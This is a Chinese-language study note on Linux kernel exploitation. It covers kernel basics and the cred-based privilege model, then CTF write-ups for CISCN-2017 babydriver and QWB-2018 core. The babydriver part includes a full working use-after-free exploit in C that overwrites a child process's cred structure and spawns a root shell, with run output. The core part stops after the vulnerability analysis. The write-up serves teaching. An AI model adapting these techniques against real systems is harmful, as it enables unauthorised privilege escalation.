初涉 Kernel Exploit。

基本是跟着 CTF-Wiki 和 M4x 师傅做的内容。

Basic Knowledge

What is kernel?

Kernel 是一个程序，用来管理软件发出的数据 I/O 要求，将这些要求转义为指令，交给 CPU 和计算机中的其他组件处理。最主要的功能有两点（包括 I/O，权限控制，系统调用，进程管理，内存管理等多项功能）：

控制并与硬件进行交互；
提供 Application 能运行的环境。

应用程序的 crash 直接终止程序，而内核的 crash 会直接引发重启。

Ring Model

Intel CPU 将 CPU 的特权级别分为 4 个级别：Ring 0、Ring 1、Ring 2 和 Ring 3。Ring 0 只给 OS 使用，Ring 3 所有程序都可以使用，内层 Ring 可以随便使用外层 Ring 的资源。而使用 Ring Model 是为了提升系统安全性。

大多数的现代操作系统只使用了 Ring 0 和 Ring 3。

Loadable Kernel Modules（LKMs）

可加载核心模块（内核模块）就像运行在内核空间的可执行程序，包括：

驱动程序（Device Drivers）
- 设备驱动
- 文件系统驱动
- …
内核扩展模块 (modules)

LKMs 的文件格式和用户态的可执行程序相同，因此可以使用 IDA 等工具来分析内核模块。

Linux 内核之所以提供模块机制，是因为它本身是一个单内核（Monolithic Kernel）。单内核的优点是效率高，所有的内容都集合在一起，但是可扩展性和可维护性相对较差，模块机制就是为了弥补这一缺陷。

syscall

系统调用是用户空间的程序向操作系统内核请求需要更高权限的服务，比如 IO 操作或者进程间通信。系统调用提供用户程序与操作系统间的接口，部分库函数实际上是对系统调用的封装。

`ioctl`

ioctl 是一个系统调用，用于与设备通信：

IOCTL(2)                    BSD System Calls Manual                   IOCTL(2)

NAME
     ioctl -- control device

SYNOPSIS
     #include <sys/ioctl.h>

     int
     ioctl(int fildes, unsigned long request, ...);

DESCRIPTION
     The ioctl() function manipulates the underlying device parameters of special files.  In particular, many operat-
     ing characteristics of character special files (e.g. terminals) may be controlled with ioctl() requests.  The
     argument fildes must be an open file descriptor.

     An  ioctl request has encoded in it whether the argument is an ``in'' parameter or ``out'' parameter, and the
     size of the argument argp in bytes.  Macros and defines used in specifying an ioctl request are located in the
     file <sys/ioctl.h>.

第一个参数 fildes 为打开设备返回的文件描述符；
第二个参数 request 为用户程序对设备的控制命令；
再后边的参数则是一些补充参数，与设备有关。

内核使用 ioctl 进行通信的原因：

操作系统提供了内核访问标准外部设备的系统调用，因为大多数硬件设备只能够在内核空间内直接寻址，但访问非标准硬件设备这些系统调用显得不合适，有时候用户模式可能需要直接访问设备；
为了解决这个问题，内核被设计成可扩展的，可以加入一个称为设备驱动的模块，驱动的代码允许在内核空间运行而且可以对设备直接寻址。一个 ioctl 接口是一个独立的系统调用，通过它用户空间可以跟设备驱动沟通。对设备驱动的请求是一个以设备和请求号码为参数的 ioctl 调用，如此内核就允许用户空间访问设备驱动进而访问设备而不需要了解具体的设备细节，同时也不需要一大堆针对不同设备的系统调用。

Status Switching

User Space to Kernel Space

当发生系统调用、产生异常、外设产生中断等事件时，会发生用户态到内核态的切换。步骤如下：

用 SWAPGS 指令切换 GS 段寄存器，将 GS 寄存器值和一个特定位置的值进行交换，目的是保存 GS 值，同时将该位置的值作为内核执行时的 GS 值使用；
将当前栈顶（用户空间栈顶）记录在 CPU 独占变量区域里，将 CPU 独占区域里记录的内核栈顶放入 RSP/ESP；
用 PUSH 指令保存各寄存器值；
判断是否为 x32_abi；
根据系统调用号跳到全局变量 sys_call_table 相应位置继续执行系统调用。

保存用户态各个寄存器的值：

ENTRY(entry_SYSCALL_64)
    /*
     * Interrupts are off on entry.
     * We do not frame this tiny irq-off block with TRACE_IRQS_OFF/ON,
     * it is too small to ever cause noticeable irq latency.
     */
    SWAPGS_UNSAFE_STACK
    /*
     * A hypervisor implementation might want to use a label
     * after the swapgs, so that it can do the swapgs
     * for the guest and jump here on syscall.
     */
GLOBAL(entry_SYSCALL_64_after_swapgs)

    movq    %rsp, PER_CPU_VAR(rsp_scratch)
    movq    PER_CPU_VAR(cpu_current_top_of_stack), %rsp

    TRACE_IRQS_OFF

    /* Construct struct pt_regs on stack */
    pushq    $__USER_DS            /* pt_regs->ss */
    pushq    PER_CPU_VAR(rsp_scratch)    /* pt_regs->sp */
    pushq    %r11                /* pt_regs->flags */
    pushq    $__USER_CS            /* pt_regs->cs */
    pushq    %rcx                /* pt_regs->ip */
    pushq    %rax                /* pt_regs->orig_ax */
    pushq    %rdi                /* pt_regs->di */
    pushq    %rsi                /* pt_regs->si */
    pushq    %rdx                /* pt_regs->dx */
    pushq    %rcx                /* pt_regs->cx */
    pushq    $-ENOSYS            /* pt_regs->ax */
    pushq    %r8                /* pt_regs->r8 */
    pushq    %r9                /* pt_regs->r9 */
    pushq    %r10                /* pt_regs->r10 */
    pushq    %r11                /* pt_regs->r11 */
    sub    $(6*8), %rsp            /* pt_regs->bp, bx, r12-15 not saved */

Kernel Space to User Space

退出内核态的步骤如下：

通过 SWAPGS 恢复 GS 值；
通过 sysretq 或者 iretq 恢复到用户上下文继续执行。如果使用 iretq 还需要给出用户空间的一些信息（CS, EFLAGS/RFLAGS, ESP/RSP 等）。

Process Structure

Kernel 中使用 cred 结构体记录进程的权限等信息（uid、gid 等），如果能修改某个进程的 cred，那么也就修改了这个进程的权限。

/*
 * The security context of a task
 *
 * The parts of the context break down into two categories:
 *
 *  (1) The objective context of a task.  These parts are used when some other
 *    task is attempting to affect this one.
 *
 *  (2) The subjective context.  These details are used when the task is acting
 *    upon another object, be that a file, a task, a key or whatever.
 *
 * Note that some members of this structure belong to both categories - the
 * LSM security pointer for instance.
 *
 * A task has two security pointers.  task->real_cred points to the objective
 * context that defines that task's actual details.  The objective part of this
 * context is used whenever that task is acted upon.
 *
 * task->cred points to the subjective context that defines the details of how
 * that task is going to act upon another object.  This may be overridden
 * temporarily to point to another security context, but normally points to the
 * same context as task->real_cred.
 */
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;        /* saved UID of the task */
    kgid_t        sgid;        /* saved GID of the task */
    kuid_t        euid;        /* effective UID of the task */
    kgid_t        egid;        /* effective GID of the task */
    kuid_t        fsuid;        /* UID for VFS ops */
    kgid_t        fsgid;        /* GID for VFS ops */
    unsigned    securebits;    /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;    /* caps we're permitted */
    kernel_cap_t    cap_effective;    /* caps we can actually use */
    kernel_cap_t    cap_bset;    /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char    jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key    *process_keyring; /* keyring private to this process */
    struct key    *thread_keyring; /* keyring private to this thread */
    struct key    *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;    /* subjective LSM security */
#endif
    struct user_struct *user;    /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;    /* supplementary groups for euid/fsgid */
    struct rcu_head    rcu;        /* RCU deletion hook */
};

Functions in Kernel

内核态中的函数对应用户态函数：

printf() -> printk()
- printk() 不一定会把内容显示到终端上，但一定在内核缓冲区里，可以通过 dmesg 查看效果
memcpy() -> copy_from_user()/copy_to_user()
- copy_from_user()：实现了将用户空间的数据传送到内核空间
- copy_to_user()：实现了将内核空间的数据传送到用户空间
malloc() -> kmalloc()
- 内核态的内存分配函数，和 malloc() 相似，但使用的是 slab/slub 分配器
free() -> kfree()，同 kmalloc()

同时 Kernel 中有两个（int commit_creds(struct cred *new) 和 struct cred *prepare_kernel_cred(struct task_struct *daemon)）可以改变权限的函数：

/**
 * commit_creds - Install new credentials upon the current task
 * @new: The credentials to be assigned
 *
 * Install a new set of credentials to the current task, using RCU to replace
 * the old set.  Both the objective and the subjective credentials pointers are
 * updated.  This function may not be called if the subjective credentials are
 * in an overridden state.
 *
 * This function eats the caller's reference to the new credentials.
 *
 * Always returns 0 thus allowing this function to be tail-called at the end
 * of, say, sys_setgid().
 */
int commit_creds(struct cred *new)
{
    struct task_struct *task = current;
    const struct cred *old = task->real_cred;

    kdebug("commit_creds(%p{%d,%d})", new,
           atomic_read(&new->usage),
           read_cred_subscribers(new));

    BUG_ON(task->cred != old);
#ifdef CONFIG_DEBUG_CREDENTIALS
    BUG_ON(read_cred_subscribers(old) < 2);
    validate_creds(old);
    validate_creds(new);
#endif
    BUG_ON(atomic_read(&new->usage) < 1);

    get_cred(new); /* we will require a ref for the subj creds too */

    /* dumpability changes */
    if (!uid_eq(old->euid, new->euid) ||
        !gid_eq(old->egid, new->egid) ||
        !uid_eq(old->fsuid, new->fsuid) ||
        !gid_eq(old->fsgid, new->fsgid) ||
        !cred_cap_issubset(old, new)) {
        if (task->mm)
            set_dumpable(task->mm, suid_dumpable);
        task->pdeath_signal = 0;
        smp_wmb();
    }

    /* alter the thread keyring */
    if (!uid_eq(new->fsuid, old->fsuid))
        key_fsuid_changed(task);
    if (!gid_eq(new->fsgid, old->fsgid))
        key_fsgid_changed(task);

    /* do it
     * RLIMIT_NPROC limits on user->processes have already been checked
     * in set_user().
     */
    alter_cred_subscribers(new, 2);
    if (new->user != old->user)
        atomic_inc(&new->user->processes);
    rcu_assign_pointer(task->real_cred, new);
    rcu_assign_pointer(task->cred, new);
    if (new->user != old->user)
        atomic_dec(&old->user->processes);
    alter_cred_subscribers(old, -2);

    /* send notifications */
    if (!uid_eq(new->uid,   old->uid)  ||
        !uid_eq(new->euid,  old->euid) ||
        !uid_eq(new->suid,  old->suid) ||
        !uid_eq(new->fsuid, old->fsuid))
        proc_id_connector(task, PROC_EVENT_UID);

    if (!gid_eq(new->gid,   old->gid)  ||
        !gid_eq(new->egid,  old->egid) ||
        !gid_eq(new->sgid,  old->sgid) ||
        !gid_eq(new->fsgid, old->fsgid))
        proc_id_connector(task, PROC_EVENT_GID);

    /* release the old obj and subj refs both */
    put_cred(old);
    put_cred(old);
    return 0;
}

/**
 * prepare_kernel_cred - Prepare a set of credentials for a kernel service
 * @daemon: A userspace daemon to be used as a reference
 *
 * Prepare a set of credentials for a kernel service.  This can then be used to
 * override a task's own credentials so that work can be done on behalf of that
 * task that requires a different subjective context.
 *
 * @daemon is used to provide a base for the security record, but can be NULL.
 * If @daemon is supplied, then the security data will be derived from that;
 * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
 *
 * The caller may change these controls afterwards if desired.
 *
 * Returns the new credentials or NULL if out of memory.
 *
 * Does not take, and does not return holding current->cred_replace_mutex.
 */
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;

    kdebug("prepare_kernel_cred() alloc %p", new);

    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred);

    validate_creds(old);

    *new = *old;
    atomic_set(&new->usage, 1);
    set_cred_subscribers(new, 0);
    get_uid(new->user);
    get_user_ns(new->user_ns);
    get_group_info(new->group_info);

#ifdef CONFIG_KEYS
    new->session_keyring = NULL;
    new->process_keyring = NULL;
    new->thread_keyring = NULL;
    new->request_key_auth = NULL;
    new->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
#endif

#ifdef CONFIG_SECURITY
    new->security = NULL;
#endif
    if (security_prepare_creds(new, old, GFP_KERNEL) < 0)
        goto error;

    put_cred(old);
    validate_creds(new);
    return new;

error:
    put_cred(new);
    put_cred(old);
    return NULL;
}

执行 commit_creds(prepare_kernel_cred(0)); 即可获得 root 权限。两个函数的地址都可以在 /proc/kallsyms 文件中查看：

$ sudo cat /proc/kallsyms | grep -E "commit_creds|prepare_kernel_cred"
ffffffff810a24a0 T commit_creds
ffffffff810a2890 T prepare_kernel_cred
ffffffff81d7f6c0 R __ksymtab_commit_creds
ffffffff81d881d0 R __ksymtab_prepare_kernel_cred
ffffffff81d9f028 r __kcrctab_commit_creds
ffffffff81da35b0 r __kcrctab_prepare_kernel_cred
ffffffff81db01e7 r __kstrtab_prepare_kernel_cred
ffffffff81db022e r __kstrtab_commit_creds

Mitigation

CANARY、DEP、PIE、RELRO 等保护与用户态原理和作用相同；
smep（Supervisor Mode Execution Protection）：当处理器处于 Ring 0 模式时，执行用户空间的代码会触发页错误；
smap（Superivisor Mode Access Protection）：类似于 smep，通常是在访问数据时；
mmap_min_addr：控制着 mmap 能够映射的最低内存地址。

Kernel UAF（CISCN-2017-babydriver）

题目中给了三个文件，boot.sh、bzImage 和 rootfs.cpio。bzImage 即为被压缩的内核可执行文件；boot.sh 为 QEMU 的启动脚本：

$ tar -xvf babydriver.tar
x boot.sh
x bzImage
x rootfs.cpio
$ file bzImage
bzImage: Linux kernel x86 boot executable bzImage, version 4.4.72 (atum@ubuntu) #1 SMP Thu Jun 15 19:52:50 PDT 2017, RO-rootFS, swap_dev 0x6, Normal VGA
$ bat boot.sh
───────┬────────────────────────────────────────────────────────────────────────
       │ File: boot.sh
───────┼────────────────────────────────────────────────────────────────────────
   1   │ #!/bin/bash
   2   │
   3   │ qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console
       │ =ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null
       │  -m 64M --nographic  -smp cores=1,threads=1 -cpu kvm64,+smep
───────┴────────────────────────────────────────────────────────────────────────

接下来主要看文件系统 rootfs.cpio。用 gunzip 对其进行解压缩，可以看到用的是 4.4.72 的内核，然后可以看到根目录下有一个 init 启动脚本，用来设置 flag 的相关权限和安装 babydriver 模块。也就是说只有变成 root 才能查看 flag：

$ file rootfs.cpio
rootfs.cpio: gzip compressed data, last modified: Tue Jul  4 08:39:15 2017, max compression, from Unix
$ mv rootfs.cpio rootfs.cpio.gz
$ gunzip ./rootfs.cpio.gz
$ file rootfs.cpio
rootfs.cpio: ASCII cpio archive (SVR4 with no CRC)
$ mkdir fs && cd fs
$ cpio -idmv < ../rootfs.cpio
.
etc
etc/init.d
etc/passwd
etc/group
bin
...
init
proc
lib
lib/modules
lib/modules/4.4.72
lib/modules/4.4.72/babydriver.ko
sys
usr
...
tmp
linuxrc
home
home/ctf
5556 blocks
$ bat init
───────┬────────────────────────────────────────────────────────────────────────
       │ File: init
───────┼────────────────────────────────────────────────────────────────────────
   1   │ #!/bin/sh
   2   │
   3   │ mount -t proc none /proc
   4   │ mount -t sysfs none /sys
   5   │ mount -t devtmpfs devtmpfs /dev
   6   │ chown root:root flag
   7   │ chmod 400 flag
   8   │ exec 0</dev/console
   9   │ exec 1>/dev/console
  10   │ exec 2>/dev/console
  11   │
  12   │ insmod /lib/modules/4.4.72/babydriver.ko
  13   │ chmod 777 /dev/babydev
  14   │ echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
  15   │ setsid cttyhack setuidgid 1000 sh
  16   │
  17   │ umount /proc
  18   │ umount /sys
  19   │ poweroff -d 0  -f
  20   │
───────┴────────────────────────────────────────────────────────────────────────

接下来看 babydriver.ko 的相关保护，和 ELF 是类似的这里只开了 NX：

$ file babydriver.ko
babydriver.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=8ec63f63d3d3b4214950edacf9e65ad76e0e00e7, not stripped
$ checksec ./babydriver.ko
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

接下来进 IDA 看看有哪些函数。先了解一个结构体 cdev（每个字符设备都对应一个 cdev 结构的变量）：

struct cdev {
    struct kobject kobj; // 每个cdev都是一个kobject
    struct module *owner; // owner指向实现驱动的模块
    const struct file_operations *ops; // 操纵这个字符设备的方法
    struct list_head list; // 与cdev对应的字符设备文件的inode链表头
    dev_t dev; // 起始设备编号
    unsigned int count; // 设备范围号大小
};

首先是模块的入口函数 babydriver_init，主要是一系列对 /dev/babydev 设备的注册：

int __cdecl babydriver_init()
{
  int v0; // edx
  __int64 v1; // rsi
  int v2; // ebx
  class *v3; // rax
  __int64 v4; // rax

  if ( (signed int)alloc_chrdev_region(&babydev_no, 0LL, 1LL, "babydev") >= 0 ) // 动态分配设备编号
  {
    cdev_init(&cdev_0, &fops); // 静态初始化cdev
    v1 = babydev_no;
    cdev_0.owner = &_this_module; // 设置owner为指定模块
    v2 = cdev_add(&cdev_0, babydev_no, 1LL); // 将cdev添加到系统中
    if ( v2 >= 0 )
    {
      v3 = (class *)_class_create(&_this_module, "babydev", &babydev_no); // 将babydev注册到内核中
      babydev_class = v3;
      if ( v3 )
      {
        v4 = device_create(v3, 0LL, babydev_no, 0LL, "babydev"); // 创建设备节点
        v0 = 0;
        if ( v4 ) // 创建成功
          return v0;
        printk(&unk_351, 0LL); // 创建设备节点失败
        class_destroy(babydev_class); // 取消注册
      }
      else // 注册失败
      {
        printk(&unk_33B, "babydev");
      }
      cdev_del(&cdev_0); // 从系统中删除cdev
    }
    else // 分配失败
    {
      printk(&unk_327, v1);
    }
    unregister_chrdev_region(babydev_no, 1LL); // 释放设备号
    return v2;
  }
  printk(&unk_309, 0LL);
  return 1;
}

然后在模块退出函数中对设备等进行删除和释放资源：

void __cdecl babydriver_exit()
{
  device_destroy(babydev_class, babydev_no);
  class_destroy(babydev_class);
  cdev_del(&cdev_0);
  unregister_chrdev_region(babydev_no, 1LL);
}

在 babyioctl 中可以看到模块中有一个结构体 babydev_struct。首先调用 kfree 释放对应的 device_buf，然后调用 kmalloc 指定大小的内存，并设置 device_buf_len：

// local variable allocation has failed, the output may be wrong!
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
  size_t v3; // rdx
  size_t len; // rbx
  __int64 result; // rax

  _fentry__(filp, *(_QWORD *)&command, arg);
  len = v3;
  if ( command == 0x10001 )
  {
    kfree(babydev_struct.device_buf);
    babydev_struct.device_buf = (char *)_kmalloc(len, 0x24000C0LL);
    babydev_struct.device_buf_len = len;
    printk("alloc done\n", 0x24000C0LL);
    result = 0LL;
  }
  else
  {
    printk(&unk_2EB, v3);
    result = -22LL;
  }
  return result;
}

在 babyopen 中打开：

int __fastcall babyopen(inode *inode, file *filp)
{
  _fentry__(inode, filp);
  babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 0x40LL);
  babydev_struct.device_buf_len = 0x40LL;
  printk("device open\n", 0x24000C0LL);
  return 0;
}

babyread 中调用 copy_to_user 从 babydev_struct.device_buf 读取指定的字符串到用户空间：

ssize_t __fastcall babyread(file *filp, char *buffer, size_t length, loff_t *offset)
{
  size_t v4; // rdx
  ssize_t result; // rax
  ssize_t v6; // rbx

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len <= v4 )
    return result;
  v6 = v4;
  copy_to_user(buffer);
  result = v6;
  return result;
}

babywrite 调用 copy_from_user 读一段数据到 babydev_struct.device_buf 上：

ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
  size_t v4; // rdx
  ssize_t result; // rax
  ssize_t v6; // rbx

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len <= v4 )
    return result;
  v6 = v4;
  copy_from_user();
  result = v6;
  return result;
}

最后 babyrelease 函数将 device_buf 对应的内存释放：

int __fastcall babyrelease(inode *inode, file *filp)
{
  _fentry__(inode, filp);
  kfree(babydev_struct.device_buf);
  printk("device release\n", filp);
  return 0;
}

这里的漏洞在于 babyopen 处没有检查打开了几个设备，存在 Use After Free，具体利用方法如下：

打开两次 /dev/babydev，第二次的分配会覆盖到第一次分配的内存，然后释放第一次分配的内存；
创建一个新进程，新进程中的 cred 结构体和之前释放的重叠，也就是修改第二次的 babydev 就能改到新进程的 cred 结构体；
创建时将第二次的 babydev 改成对应 cred 结构体的大小（如下），然后把对应偏移处的 gid 和 uid 改为 0，就实现了提权到 root。

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC    0x43736564
#define CRED_MAGIC_DEAD    0x44656144
#endif
    kuid_t        uid;        /* real UID of the task */
    kgid_t        gid;        /* real GID of the task */
    kuid_t        suid;        /* saved UID of the task */
    kgid_t        sgid;        /* saved GID of the task */
    kuid_t        euid;        /* effective UID of the task */
    kgid_t        egid;        /* effective GID of the task */
    kuid_t        fsuid;        /* UID for VFS ops */
    kgid_t        fsgid;        /* GID for VFS ops */
    unsigned    securebits;    /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;    /* caps we're permitted */
    kernel_cap_t    cap_effective;    /* caps we can actually use */
    kernel_cap_t    cap_bset;    /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char    jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key    *process_keyring; /* keyring private to this process */
    struct key    *thread_keyring; /* keyring private to this thread */
    struct key    *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;    /* subjective LSM security */
#endif
    struct user_struct *user;    /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;    /* supplementary groups for euid/fsgid */
    struct rcu_head    rcu;        /* RCU deletion hook */
};

Exploit：

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>

int main() {
    int fd1, fd2, pid;
    fd1 = open("/dev/babydev", 2);
    fd2 = open("/dev/babydev", 2);
    ioctl(fd1, 0x10001, 0xa8); // 修改babydev_struct.device_buf_len的长度为cred结构体的长度
    close(fd1); // 释放第一次的内存

    pid = fork(); // 创建进程
    if (pid < 0) {
        puts("[!] fork error...");
        exit(-1);
    } else if (pid == 0) { // 子进程
        uint8_t fake_cred[30];
        memset(fake_cred, 0, sizeof(fake_cred));
        write(fd2, fake_cred, 28);
        if (getuid() == 0) {
            puts("[+] get root!");
            system("/bin/sh");
            exit(0);
        }
    } else {
        wait(NULL);
    }
    close(fd2);
    return 0;
}

因为文件系统中没有 Library，需要静态编译才能正常执行。然后打包新的文件系统后运行 boot.sh：

$ make
cc -static    exp.c   -o exp
$ file ./exp
./exp: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=8af26f6763d0d44db98089ae847f6104a4054c93, not stripped
$ cd fs/ && find . | cpio -o --format=newc > ../rootfs.cpio
7349 blocks
$ cd .. && sudo ./boot.sh

使用 lsmod 可以查看加载模块的基地址：

/ $ lsmod
babydriver 16384 0 - Live 0xffffffffc0000000 (OE)
/ $ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
/ $ cat flag
cat: can't open 'flag': Permission denied
/ $ /tmp/exp
[   23.769095] device open
[   23.773231] device open
[   23.775415] alloc done
[   23.784434] device release
[+] get root!
/ # id
uid=0(root) gid=0(root) groups=1000(ctf)
/ # cat flag
flag{this_is_a_flag}
/ #

P4nda 以及 Anceity 两位大佬都提供了 ROP 的做法。

Kernel ROP（QWB-2018-core）

题目给了四个文件，vmlinux 即为 bzImage 未解压缩的版本（可以用 extract-vmlinux 来对 bzImage 解压缩）。start.sh 是一个启动脚本，其中可以看到开了 kalsr：

$ tar -zxvf core_give.tar.gz
./give_to_player/
./give_to_player/bzImage
./give_to_player/vmlinux
./give_to_player/core.cpio
./give_to_player/start.sh
$ bat start.sh
───────┬────────────────────────────────────────────────────────────────────────
       │ File: start.sh
───────┼────────────────────────────────────────────────────────────────────────
   1   │ qemu-system-x86_64 \
   2   │ -m 64M \
   3   │ -kernel ./bzImage \
   4   │ -initrd  ./core.cpio \
   5   │ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"
       │  \
   6   │ -s  \
   7   │ -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
   8   │ -nographic  \

然后跟前面一样看一下看看文件系统里有啥，init 同样可以得到很多信息，：

第 9 行把 /proc/kallsyms 的内容保存到了 /tmp/kallsyms，那么就可以从 /tmp/kallsyms 中读取到 commit_creds 和 prepare_kernel_cred 的地址；
第 10 行把 kptr_restrict 设为 1，禁止通过 /proc/kallsyms 查看函数地址，不过前面已经把其中的信息保存到了一个可读的文件中；
第 11 行把 dmesg_restrict 设为 1，禁止使用 dmesg；
第 18 行设置了定时关机，为了避免做题时产生干扰，可以直接把这句删掉然后重新打包。

$ file core.cpio
core.cpio: gzip compressed data, last modified: Fri Oct  5 14:08:36 2018, max compression, from Unix
$ mv core.cpio core.cpio.gz
$ gunzip ./core.cpio.gz
$ ls
core.cpio
$ file ./core.cpio
./core.cpio: ASCII cpio archive (SVR4 with no CRC)
$ cpio -idmv < ./core.cpio
.
usr
usr/sbin
...
init
etc
etc/group
etc/passwd
lib64
lib64/ld-linux-x86-64.so.2
lib64/libc.so.6
lib64/libm.so.6
...
gen_cpio.sh
bin
...
vmlinux
root
linuxrc
lib
lib/modules
...
tmp
core.cpio
core.ko
129851 blocks
$ bat init
───────┬────────────────────────────────────────────────────────────────────────
       │ File: init
───────┼────────────────────────────────────────────────────────────────────────
   1   │ #!/bin/sh
   2   │ mount -t proc proc /proc
   3   │ mount -t sysfs sysfs /sys
   4   │ mount -t devtmpfs none /dev
   5   │ /sbin/mdev -s
   6   │ mkdir -p /dev/pts
   7   │ mount -vt devpts -o gid=4,mode=620 none /dev/pts
   8   │ chmod 666 /dev/ptmx
   9   │ cat /proc/kallsyms > /tmp/kallsyms
  10   │ echo 1 > /proc/sys/kernel/kptr_restrict
  11   │ echo 1 > /proc/sys/kernel/dmesg_restrict
  12   │ ifconfig eth0 up
  13   │ udhcpc -i eth0
  14   │ ifconfig eth0 10.0.2.15 netmask 255.255.255.0
  15   │ route add default gw 10.0.2.2
  16   │ insmod /core.ko
  17   │
  18   │ poweroff -d 120 -f &
  19   │ setsid /bin/cttyhack setuidgid 1000 /bin/sh
  20   │ echo 'sh end!\n'
  21   │ umount /proc
  22   │ umount /sys
  23   │
  24   │ poweroff -d 0  -f
───────┴────────────────────────────────────────────────────────────────────────

可以使用 gen_cpio.sh 重新打包；

如果不能正常启动，将 QEMU 的内存参数改为 128M。

接下来对模块文件进行分析。可以开导开了 Canary 和 NX：

$ file ./core.ko
./core.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=54943668385c6573ec1b40a7c06127d9423103b3, not stripped
$ checksec ./core.ko
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

模块入口函数中注册了 /proc/core：

__int64 init_module()
{
  core_proc = proc_create("core", 438LL, 0LL, &core_fops);
  printk(&unk_2DE);
  return 0LL;
}

在退出函数中删除 /proc/core：

__int64 exit_core()
{
  __int64 result; // rax

  if ( core_proc )
    result = remove_proc_entry("core");
  return result;
}

在 core_ioctl 中有一条 Switch 语句，分别对应 core_read、设置全局变量 off 的值以及 core_copy_func：

__int64 __fastcall core_ioctl(__int64 a1, int c, __int64 data_1)
{
  __int64 data; // rbx

  data = data_1;
  switch ( c )
  {
    case 0x6677889B:
      core_read(data_1);
      break;
    case 0x6677889C:
      printk(&unk_2CD);
      off = data;
      break;
    case 0x6677889A:
      printk(&unk_2B3);
      core_copy_func(data);
      break;
  }
  return 0LL;
}

core_read 从 v5+off 的位置复制 0x40 个字节到用户空间，也就是可以进行任意读：

unsigned __int64 __fastcall core_read(__int64 a1)
{
  __int64 v1; // rbx
  char *v2; // rdi
  signed __int64 i; // rcx
  unsigned __int64 result; // rax
  char v5; // [rsp+0h] [rbp-50h]
  unsigned __int64 v6; // [rsp+40h] [rbp-10h]

  v1 = a1;
  v6 = __readgsqword(0x28u);
  printk(&unk_25B);
  printk(&unk_275);
  v2 = &v5;
  for ( i = 0x10LL; i; --i )
  {
    *(_DWORD *)v2 = 0; // memset(v2, 0, sizeof(v2))
    v2 += 4;
  }
  strcpy(&v5, "Welcome to the QWB CTF challenge.\n");
  result = copy_to_user(v1, &v5 + off, 0x40LL);
  if ( !result )
    return __readgsqword(0x28u) ^ v6;
  __asm { swapgs }
  return result;
}

core_copy_func 则是从全局变量 name 中复制指定长度的内容到局部变量 buf 上。且传入的长度是有符号整型 signed __int64，而 qmemcpy 的长度使用的是无符号整型 unsigned __int16，可以通过溢出来绕过前面的检查：

signed __int64 __fastcall core_copy_func(signed __int64 len)
{
  signed __int64 result; // rax
  __int64 buf; // [rsp+0h] [rbp-50h]
  unsigned __int64 v3; // [rsp+40h] [rbp-10h]

  v3 = __readgsqword(0x28u);
  printk(&unk_215);
  if ( len > 0x3F )
  {
    printk(&unk_2A1);
    result = 0xFFFFFFFFLL;
  }
  else
  {
    result = 0LL;
    qmemcpy(&buf, &name, (unsigned __int16)len);
  }
  return result;
}

core_write 往全局变量 name 上写指定内容：

signed __int64 __fastcall core_write(__int64 a1, __int64 buf, unsigned __int64 a3)
{
  unsigned __int64 len; // rbx

  len = a3;
  printk(&unk_215);
  if ( len <= 0x800 && !copy_from_user(&name, buf, len) )
    return (unsigned int)len;
  printk(&unk_230);
  return 0xFFFFFFF2LL;
}

